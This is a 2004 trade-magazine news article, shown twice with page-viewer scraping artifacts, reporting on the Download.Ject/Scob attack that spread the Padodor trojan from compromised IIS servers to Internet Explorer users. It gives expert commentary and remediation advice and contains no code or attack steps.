1
U S government and industry experts voiced fears on the week ending 25 June of an impending massive attack that combined hacking, malcode-injection, and spamming. However, the attack was thwarted when Internet engineers shut down a Russian server that had been delivering the ‘Padodor trojan’, and other malicious components. F-Secure has said that the Trojan downloaded to PCs from compromised IIS servers was almost certainly the work of HangUP, whose trademark term, 'Padonok', was discovered in the code. "Unless they provided their Padodor source code to someone else (which is doubtful), they are responsible for the latest Padodor/Qukart incidents," said F-Secure in a statement. For sure, the attack is evidence of an underground trend that will not go away, as hackers turn home and corporate PCs into relay points for spam. The attack ran like this. US-CERT declared itself aware, on 25 June, of 'new activity affecting compromised web sites running Micro- soft's Internet Information Server (IIS) 5 and possibly end-user systems that visit these sites'. The agency reported that 'compromised sites are appending JavaScript to the bottom of web pages', which, when executed attempts to access a file hosted on another server. This file may contain malicious code that can affect the end-user's system'. Once the hackers break into a site, files were modified, and a Trojan downloader called "Scob" or "Download.Ject" was appended to the files causing IE to execute it. The web site visitor did (and does) not have to click on any links. Just visiting an infected site will trigger the exploit. The Trojan horse, which was surreptitiously downloaded to machines running Internet Explorer from infected Internet Information Services (IIS) servers, watched for log-in information for prominent sites such as PayPal, eBay, EarthLink, and Yahoo, then attempted to steal confidential financial information, such as credit card numbers. Still other reports say that the hackers behind the malware were actually loading computers with adware or spamware — software that can push unwanted ads to users or steal personal data for the purpose of spamming. Phillip Hallam-Baker, principal scientist, VeriSign Security Services commented that "the CERT description was somewhat unclear. It was reported as an IIS issue, but the description given mentioned JavaScript code being appended to web pages to attack customers. That would make it a description of an exploit, rather than a description of a vulnerability. "What is significant here is that web site compromises have moved beyond merely vandalizing the site to victimizing the user of the site. "The advisory is right to point out that people can protect themselves by turning off JavaScript, but unfortunately JavaScript use is widespread. I hope that people don't read the advisory and then conclude that security problems are the fault of the user." Meanwhile, Microsoft said it was investigating a report of a security issue known as Download.Ject affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer. It urged web administrators to apply update 835732, which was addressed by MS04-011. However, it is still unclear whether this will do the trick. The Sans Internet Storm Center said that several server administrators reported that they were fully patched, and yet also breached. 'We do not know at this point how the affected servers have been compromised', the Center's alert said on 25 June. 'The SSL-PCT exploit is at the top of our list of suspects. If you find a compromised server, we strongly recommend a complete rebuild. You may be able to get your web site back into business by changing the footer setting and removing the JavaScript file. But this is a very sophisticated attack and you should expect other stealthy backdoors.' Hallam-Baker said that it was "unfortunate that this was reported as an IIS issue since it is a development that all Web server administrators should be aware of. Whatever server you are running, your site may be used to attack your customers if it is compromised." Confusion was also rife over how widespread the infections were. According to Marty Lidner, an incident-handling team leader at the CERT Coordination Center: "CERT found infections on about 100 Web sites of varying sizes [on 27 June] and informed their operators of the problem. But many other Web sites are likely to be infected that CERT is unaware of." Jay Heiser, analyst at TruSecure said: "it is too early to really have a firm opinion on exactly what happened, and its significance. The dust hasn't cleared on this one yet. "However, JavaScript, like virtually all other forms of mobile code, is not as carefully designed as Java itself, and is vulnerable to exploit. Microsoft's choice of integrating Internet-delivered mobile code with desktop capability has provided unprecedented levels of convenience and power … but this failure is typical of the types of failure that are inevitable with this model. "We will continue to see failures like this, and it is reasonable to assume that some of them will be more serious than this latest one", he added. Hallam-Baker commented that "organized crime is certainly involved in a large number of hacking attacks. This tends to be a tautology though since computer crimes typically involve several people. Certainly there are groups of hackers in several former USSR/eastern bloc countries who perform extortion rackets. "Whoever is behind this appears to be interested in targeting ordinary users of the web. Regardless of the nationality, these appear to be dark forces." By 9 July, Websense, an enterprise software firm, had discovered 114 web sites distributing the malicious JavaScript programme — two weeks after the first sighting. It’s not over yet. n e w s 6 Infosecurity Today July/August 2004 Russia-based attack averted but sign of dark things to come Brian McKenna Hallam-Baker: dark forces at work

Russia-based attack averted but sign of dark things to come

Embed Size (px)

Citation preview

Page 1: Russia-based attack averted but sign of dark things to come

US government and industry experts voiced

fears on the week ending 25 June of an

impending massive attack that combined

hacking, malcode-injection, and spamming.

However, the attack was thwarted when

Internet engineers shut down a Russian server

that had been delivering the ‘Padodor trojan’,

and other malicious components.

F-Secure has said that the Trojan

downloaded to PCs from compromised IIS

servers was almost certainly the work of

HangUP, whose trademark term, 'Padonok',

was discovered in the code.

"Unless they provided their Padodor source

code to someone else (which is doubtful), they

are responsible for the latest Padodor/Qukart

incidents," said F-Secure in a statement.

For sure, the attack is evidence of an

underground trend that will not go away, as

hackers turn home and corporate PCs into

relay points for spam.

The attack ran like this. US-CERT declared

itself aware, on 25 June, of 'new activity

affecting compromised web sites running Micro-

soft's Internet Information Server (IIS) 5 and

possibly end-user systems that visit these sites'.

The agency reported that 'compromised

sites are appending JavaScript to the bottom

of web pages', which, when executed attempts

to access a file hosted on another server. This

file may contain malicious code that can

affect the end-user's system'.

Once the hackers break into a site, files

were modified, and a Trojan downloader

called "Scob" or "Download.Ject" was

appended to the files causing IE to execute it.

The web site visitor did (and does) not have to

click on any links. Just visiting an infected site

will trigger the exploit.

The Trojan horse, which was surreptitiously

downloaded to machines running Internet

Explorer from infected Internet Information

Services (IIS) servers, watched for log-in

information for prominent sites such as

PayPal, eBay, EarthLink, and Yahoo, then

attempted to steal confidential financial

information, such as credit card numbers.

Still other reports say that the hackers

behind the malware were actually loading

computers with adware or spamware —

software that can push unwanted ads to users

or steal personal data for the purpose of

spamming.

Phillip Hallam-Baker, principal scientist,

VeriSign Security Services commented that

"the CERT description was somewhat unclear.

It was reported as an IIS issue, but the

description given mentioned JavaScript code

being appended to web pages to attack

customers. That would make it a description

of an exploit, rather than a description of a

vulnerability.

"What is significant here is that web site

compromises have moved beyond merely

vandalizing the site to victimizing the user of

the site.

"The advisory is right to point out that

people can protect themselves by turning off

JavaScript, but unfortunately JavaScript use is

widespread. I hope that people don't read the

advisory and then conclude that security

problems are the fault of the user."

Meanwhile, Microsoft said it was

investigating a report of a security issue

known as Download.Ject affecting customers

using Microsoft Internet Information Services

5.0 (IIS) and Microsoft Internet Explorer.

It urged web administrators to apply update

835732, which was addressed by MS04-011.

However, it is still unclear whether this will

do the trick. The Sans Internet Storm Center

said that several server administrators

reported that they were fully patched, and yet

also breached.

'We do not know at this point how the

affected servers have been compromised', the

Center's alert said on 25 June. 'The SSL-PCT

exploit is at the top of our list of suspects. If

you find a compromised server, we strongly

recommend a complete rebuild. You may be

able to get your web site back into business by

changing the footer setting and removing the

JavaScript file. But this is a very sophisticated

attack and you should expect other stealthy

backdoors.'

Hallam-Baker said that it was "unfortunate

that this was reported as an IIS issue since it is

a development that all Web server

administrators should be aware of. Whatever

server you are running, your site may be used

to attack your customers if it is

compromised."

Confusion was also rife over how

widespread the infections were. According to

Marty Lidner, an incident-handling team

leader at the CERT Coordination Center:

"CERT found infections on about 100 Web

sites of varying sizes [on 27 June] and

informed their operators of the problem. But

many other Web sites are likely to be infected

that CERT is unaware of."

Jay Heiser, analyst at TruSecure said: "it is

too early to really have a firm opinion on

exactly what happened, and its significance.

The dust hasn't cleared on this one yet.

"However, JavaScript, like virtually all other

forms of mobile code, is not as carefully

designed as Java itself, and is vulnerable to

exploit. Microsoft's choice of integrating

Internet-delivered mobile code with desktop

capability has provided unprecedented levels

of convenience and power … but this failure is

typical of the types of failure that are

inevitable with this model.

"We will continue to see failures like this,

and it is reasonable to assume that some of

them will be more serious than this latest

one", he added.

Hallam-Baker commented that "organized

crime is certainly involved in a large number

of hacking attacks. This tends to be a

tautology though since computer crimes

typically involve several people. Certainly

there are groups of hackers in several former

USSR/eastern bloc countries who perform

extortion rackets.

"Whoever is behind this appears to be

interested in targeting ordinary users of the

web. Regardless of the nationality, these

appear to be dark forces."

By 9 July, Websense, an enterprise software

firm, had discovered 114 web sites distributing

the malicious JavaScript programme — two

weeks after the first sighting. It’s not over yet.

ne

ws

6In

fosecu

rity Tod

ayJuly/A

ugust 2004

Russia-based attack averted but sign of dark things to comeBrian McKenna

Hallam-Baker: dark forces at work